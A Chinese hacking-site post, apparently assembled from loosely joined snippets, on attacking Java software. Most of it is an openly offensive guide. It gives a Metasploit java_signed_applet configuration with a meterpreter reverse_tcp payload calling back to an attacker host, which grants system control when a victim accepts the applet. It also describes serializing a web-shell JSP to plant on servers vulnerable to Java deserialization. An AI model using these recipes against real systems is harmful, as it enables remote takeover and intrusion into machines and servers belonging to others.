包含如何攻击jawa软件的词条
作者:hacker | 分类:渗透破解 | 浏览:86 | 日期:2022年07月18日文章目录:
怎样解决buffer overflow攻击 java
buffer overflow protection的中文意思是缓冲溢出区保护。McAfee的缓冲溢出区保护可以防止恶意代码通过软件的漏洞执行从而威胁系统安全。缓冲溢出区保护的警告并不都意味着碰到了病毒。你可以在控制台里面的缓冲溢出区保护的属性里面设置排除项...
如何使用Metasploit进行Java Applet攻击
安装 Sun Java JDK 和 rjb gem, 并且设置环境变量
—–code—–
root@bt: apt-get install sun-java6-jdk
root@bt: gem install rjb
变量设置
root@bt: echo “JAVA_HOME=/usr/lib/jvm/java-6-sun” /etc/bash.bashrc
root@bt: echo “export JAVA_HOME” /etc/bash.bashrc
root@bt: JAVA_HOME=/usr/lib/jvm/java-6-sun
root@bt: export JAVA_HOME
—end code——
—start metasploit—–
use exploit/multi/browser/java_signed_applet
set TARGET 1 //请注意你的目标
set SRVHOST 10.2.4.200
set SRVPORT 80
set URIPATH pentura
set PAYLOAD /meterpreter/reverse_tcp
set LHOST 10.2.4.200
set LPORT 4444
—end metasploit——–
———————————————————————-
如果当有一台机子访问了你的80端口
METASPLOIT控制端里将会显示详细的信息
———————————————————————
访问你80端口的机子浏览器会跳出java窗口,如果目标点击确定,你就能取得系统权限
你还可以修改java小程序的,以便实现更加真是的ssl.
如何攻击Java反序列化过程
反序列化顾名思义就是用二进制的形式来生成文件,由于common-collections.jar几乎在所有项目里都会被用到,所以当这个漏洞被发现并在这个jar包内实现攻击时,几乎影响了一大批的项目,weblogic的中枪立刻提升了这个漏洞的等级(对weblogic不熟悉的可以百度)。
至于如何使用这个漏洞对系统发起攻击,举一个简单的例子,我通过本地java程序将一个带有后门漏洞的jsp(一般来说这个jsp里的代码会是文件上传和网页版的SHELL)序列化,将序列化后的二进制流发送给有这个漏洞的服务器,服务器会自动根据流反序列化的结果生成文件,然后就可以大摇大摆的直接访问这个生成的JSP文件把服务器当后花园了。
如果Java应用对用户输入,即不可信数据做了反序列化处理,那么攻击者可以通过构造恶意输入,让反序列化产生非预期的对象,非预期的对象在产生过程中就有可能带来任意代码执行。
所以这个问题的根源在于类ObjectInputStream在反序列化时,没有对生成的对象的类型做限制;假若反序列化可以设置Java类型的白名单,那么问题的影响就小了很多。